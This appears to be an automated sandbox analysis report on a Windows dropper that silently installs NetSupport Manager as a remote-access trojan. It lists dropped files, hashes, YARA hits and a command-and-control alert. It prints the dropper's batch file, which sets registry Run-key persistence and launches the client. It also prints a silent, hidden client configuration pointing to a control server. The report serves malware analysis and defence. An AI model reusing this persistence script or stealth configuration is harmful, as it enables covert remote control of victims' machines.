Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: lFxGd66yDa.exe, Detection: malicious, Browse Filename: Jjv9ha2GKn.exe, Detection: malicious, Browse Filename: 5q1Wm5VlqL.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\NSM.LIC

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	257
Entropy (8bit):	5.119720931145611
Encrypted:	false
SSDEEP:	6:O/oPn4xRPjwx1lDKHMoEEjLgpW2MezvLdNWYpPM/ioVLa8l6i7s:XeR7wx6JjjqW2MePBPM/ioU8l6J
MD5:	7067AF414215EE4C50BFCD3EA43C84F0
SHA1:	C331D410672477844A4CA87F43A14E643C863AF9
SHA-256:	2050CC232710A2EA6A207BC78D1EAC66A4042F2EE701CDFEEE5DE3DDCDC31D12
SHA-512:	17B888087192BCEA9F56128D0950423B1807E294D1C4F953D1BF0F5BD08E5F8E35AFEEE584EBF9233BFC44E0723DB3661911415798159AC118C8A42AAF0B902F
Malicious:	false
Preview:	1200..0x3bcb348e....; NetSupport License File...; Generated on 11:54 - 21/03/2018........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=EVALUSION..maxslaves=5000..os2=1..product=10..serial_no=NSM165348..shrink_wrap=0..transport=0..

C:\Users\Public\Netstat\PCICHEK.DLL

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18808
Entropy (8bit):	6.22028391196942
Encrypted:	false
SSDEEP:	192:1ANeiOT8Z2b6SoVF6RRHaPrpF3o47jtd3hfwHjvud3hfwx7bjuh:1ANt+E2exrpxTSDuTuih
MD5:	A0B9388C5F18E27266A31F8C5765B263
SHA1:	906F7E94F841D464D4DA144F7C858FA2160E36DB
SHA-256:	313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
SHA-512:	6051A0B22AF135B4433474DC7C6F53FB1C06844D0A30ED596A3C6C80644DF511B023E140C4878867FA2578C79695FAC2EB303AEA87C0ECFC15A4AD264BD0B3CD
Malicious:	false
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICHEK.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: lFxGd66yDa.exe, Detection: malicious, Browse Filename: Jjv9ha2GKn.exe, Detection: malicious, Browse Filename: 5q1Wm5VlqL.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sv..7.d.7.d.7.d.,...5.d.,...4.d.>o..0.d.7.e...d.,...3.d.,...6.d.,...6.d.,...6.d.Rich7.d.........PE..L...f..U...........!......................... ...............................`............@.........................p"..a.... ..P....@............... ..x)...P......@ ............................................... ..@............................text...$........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\PCICL32.DLL

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3735416
Entropy (8bit):	6.525042992590476
Encrypted:	false
SSDEEP:	49152:cTXNZ+0ci2aYNT8wstdAukudJ1xTvIZamclSp+73mPu:cTXNo0cpKwstTJIkS43mm
MD5:	00587238D16012152C2E951A087F2CC9
SHA1:	C4E27A43075CE993FF6BB033360AF386B2FC58FF
SHA-256:	63AA18C32AF7144156E7EE2D5BA0FA4F5872A7DEB56894F6F96505CBC9AFE6F8
SHA-512:	637950A1F78D3F3D02C30A49A16E91CF3DFCCC59104041876789BD7FDF9224D187209547766B91404C67319E13D1606DA7CEC397315495962CBF3E2CCD5F1226
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\PCICL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(.t.I.'.I.'.I.'A..'.I.'...'.I.'.?#'.I.'...'.I.'.1.'.I.'.I.'.J.'.1.'.I.'.1.'.I.'..#',I.'.."'.I.'...'.I.'...'.I.'...'.I.'Rich.I.'................PE..L......V...........!......... ..............0................................9.....f-9.....................................4........`................8.x)...P7.p....@.......................P.......P..@............0..........`....................text............................... ..`.rdata.......0......................@..@.data....%..........................@....tls.........@......................@....hhshare.....P......................@....rsrc........`......................@..@.reloc..(2...P7..4....6.............@..B........................................................................................................................................................................................................

C:\Users\Public\Netstat\TCCTL32.DLL

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	396664
Entropy (8bit):	6.809064783360712
Encrypted:	false
SSDEEP:	12288:OpwbUb48Ju0LIFZB4Qaza4yFaMHAZtJ4Yew2j/bJa+neNQ:epq7BaGIn4BbLneNQ
MD5:	EAB603D12705752E3D268D86DFF74ED4
SHA1:	01873977C871D3346D795CF7E3888685DE9F0B16
SHA-256:	6795D760CE7A955DF6C2F5A062E296128EFDB8C908908EDA4D666926980447EA
SHA-512:	77DE0D9C93CCBA967DB70B280A85A770B3D8BEA3B707B1ABB037B2826B48898FEC87924E1A6CCE218C43478E5209E9EB9781051B4C3B450BEA3CD27DBD32C7F3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\TCCTL32.DLL, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L...Y?XV...........!................................................................'.....@.............................o...T...x....0..@...............x)...@..\E..................................`d..@...............h............................text............................... ..`.rdata../...........................@..@.data...h............\|..............@....rsrc...@....0......................@..@.reloc.. F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\bild.exe

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	105848
Entropy (8bit):	4.68250265552195
Encrypted:	false
SSDEEP:	384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
MD5:	8D9709FF7D9C83BD376E01912C734F0A
SHA1:	E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
SHA-256:	49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
SHA-512:	042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\client32.ini

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	701
Entropy (8bit):	5.5326954211374355
Encrypted:	false
SSDEEP:	12:yZqzd+mPZGS/py6z8BlsVTXuZ7+DP981E7GXXfDWQClnmSuYIAlkz6:QqzEmPZly6YBlLoG1fXXfDirIAaz6
MD5:	0F81A0520491093CA88F974D4FBAFE11
SHA1:	555B4DCF7612435066DE5B5DC319855A48D5EAF7
SHA-256:	2C27FB0A37F8BDFCCE98DAB852DEE3C2950C9810394A441A19ECE63C64DAF818
SHA-512:	7B68AE33017D28A37982E718F0393FF7047C43B50AAD595D48A0AC61268D6D4162319D8B41B9997B577649D323206A4764E5D502CBC3715DAD35692253D8A9E0
Malicious:	false
Preview:	0x137310df....[Client].._present=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAOeJWid73S6SvOyjjiTDVewA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SOS_Alt=0..SOS_LShift=0..SOS_RShift=0..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0......[HTTP]..GatewayAddress=45.76.253.210:443..gsk=EFHH;K>OBDEJ9A<I@BCB..gskmode=0..gsku=EFHH;K>OBDEJ9A<I@BCB..GSKX=EFHH;K>OBDEJ9A<I@BCB....

C:\Users\Public\Netstat\msvcr100.dll

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	773968
Entropy (8bit):	6.901559811406837
Encrypted:	false
SSDEEP:	12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:	0E37FBFA79D349D672456923EC5FBBE3
SHA1:	4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:	8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:	2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\netsup.bat

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	5.151957838855328
Encrypted:	false
SSDEEP:	6:hwszH1j0KpIAgidquH2QcfoZH1j0KpIAgidquH2QW3A:HVj0Kprgidqu++Vj0Kprgidqu2w
MD5:	7604BB3E3698A7074FF39ECA4195391F
SHA1:	F07E84CED88C3076B7A295FD845F7E420DCC3AF8
SHA-256:	FE14D5B612CC516A7DDE97E3FE93FE35573F808B036E9C9513FCEADCB1BCC751
SHA-512:	8639E1079F8E2DFD6AFB7CDCF4C6326B514A10C41841BEE035F62BA2234E60F13625515588787339CE1C469925595060EA2A9A1F2B3A60AA0D378F00540872C6
Malicious:	true
Preview:	@echo off..REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\bild.exe"..REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "%Public%\Netstat\bild.exe"..start %Public%\Netstat\bild.exe..

C:\Users\Public\Netstat\nskbfltr.inf

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	328
Entropy (8bit):	4.93007757242403
Encrypted:	false
SSDEEP:	6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:	26E28C01461F7E65C402BDF09923D435
SHA1:	1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:	D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:	C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:	false
Preview:	; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

C:\Users\Public\Netstat\pcicapi.dll

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33144
Entropy (8bit):	6.737780491933496
Encrypted:	false
SSDEEP:	768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:	DCDE2248D19C778A41AA165866DD52D0
SHA1:	7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:	9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:	C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Netstat\remcmdstub.exe

Download File

Process:	C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	77224
Entropy (8bit):	6.793971095882093
Encrypted:	false
SSDEEP:	1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
MD5:	325B65F171513086438952A152A747C4
SHA1:	A1D1C397902FF15C4929A03D582B09B35AA70FC0
SHA-256:	26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
SHA-512:	6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.\|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.940363800405678
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
File size:	2'138'135 bytes
MD5:	47cfce938a71540a2039aebd5abe0783
SHA1:	641d20b31f5b2aba11746d1e533cbe4d4ee9c6ed
SHA256:	d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d582b6d0b6f188306954
SHA512:	338c95a30ccfbfe81b9a12d6ce01a68fdc3ace65da5fff17ccd06dbb4aa135cdf5ce3947107fd2ea46d32406bf6b30c908b6af673268b7c2ca554a7b67ddd4a1
SSDEEP:	49152:VIf96RO0EkHbG+xw6NbHHBp7k5hhelN6YawnqLKwgVRl:VIFP6wYt5ShAiYawbwW
TLSH:	CBA52302F9C6C5B2D53308390A68AB55797DBF342F28DD6FA78D5E1ACA301917338A53
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41d779
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	00be6e6c4f9e287672c8301b72bdabf3

Entrypoint Preview

Instruction
call 00007F6268B0916Fh
jmp 00007F6268B08B63h
cmp ecx, dword ptr [0043A1C8h]
jne 00007F6268B08CD5h
ret
jmp 00007F6268B092E6h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00430FE8h
mov dword ptr [ecx], 00431994h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F6268AFC26Dh
mov dword ptr [esi], 004319A0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004319A8h
mov dword ptr [ecx], 004319A0h
ret
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00431988h
push eax
call 00007F6268B0BE7Eh
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 00431988h
push eax
call 00007F6268B0BE67h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F6268B08CDCh
push 0000000Ch
push esi
call 00007F6268B082A2h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F6268B08C3Eh
push 00437B58h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F6268B0B566h
int3
push ebp
mov ebp, esp
sub esp, 0Ch

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x38cd0	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x38d04	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5d000	0xe034	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6c000	0x1fd0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x36ee0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x31928	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x30000	0x25c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x38254	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2e864	0x2ea00	8c2dd3ebce78edeed565107466ae1d3e	False	0.5908595844504021	data	6.693477406609911	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x30000	0x9aac	0x9c00	b8d3a709e8e2861298e51f270be0f883	False	0.45718149038461536	data	5.133828516884417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3a000	0x213d0	0xc00	7a066b052b7178cd1388c71d17dec570	False	0.2789713541666667	data	3.2428863859698565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids	0x5c000	0xe8	0x200	0a8129f1f5d2e8ddcb61343ecd6f891a	False	0.33984375	data	2.0959167744603624	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x5d000	0xe034	0xe200	d62594e063ef25acc085c21831d77a75	False	0.6341779590707964	data	6.802287495720703	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6c000	0x1fd0	0x2000	983e78af74da826d9233ebaa3055869a	False	0.8060302734375	data	6.687357530503152	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
PNG	0x5d644	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	1.0027729636048528
PNG	0x5e18c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	0.9363390441839495
RT_ICON	0x5f738	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	0.47832369942196534
RT_ICON	0x5fca0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	0.5410649819494585
RT_ICON	0x60548	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	0.4933368869936034
RT_ICON	0x613f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	0.5390070921985816
RT_ICON	0x61858	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.41393058161350843
RT_ICON	0x62900	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	0.3479253112033195
RT_ICON	0x64ea8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9809269502193401
RT_DIALOG	0x68c1c	0x2a2	data	0.5296735905044511
RT_DIALOG	0x68ec0	0x13a	data	0.6624203821656051
RT_DIALOG	0x68ffc	0xf2	data	0.71900826446281
RT_DIALOG	0x690f0	0x14e	data	0.5868263473053892
RT_DIALOG	0x69240	0x318	data	0.476010101010101
RT_DIALOG	0x69558	0x24a	data	0.6262798634812287
RT_STRING	0x697a4	0x1fc	data	0.421259842519685
RT_STRING	0x699a0	0x246	data	0.41924398625429554
RT_STRING	0x69be8	0x1dc	data	0.5105042016806722
RT_STRING	0x69dc4	0xdc	data	0.65
RT_STRING	0x69ea0	0x468	data	0.375
RT_STRING	0x6a308	0x164	data	0.5056179775280899
RT_STRING	0x6a46c	0xe4	data	0.6359649122807017
RT_STRING	0x6a550	0x158	data	0.4563953488372093
RT_STRING	0x6a6a8	0xe8	data	0.5948275862068966
RT_STRING	0x6a790	0xe6	data	0.5695652173913044
RT_GROUP_ICON	0x6a878	0x68	data	0.7019230769230769
RT_MANIFEST	0x6a8e0	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	0.3957333333333333

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T17:47:45.194573+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.5	49704	45.76.253.210	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
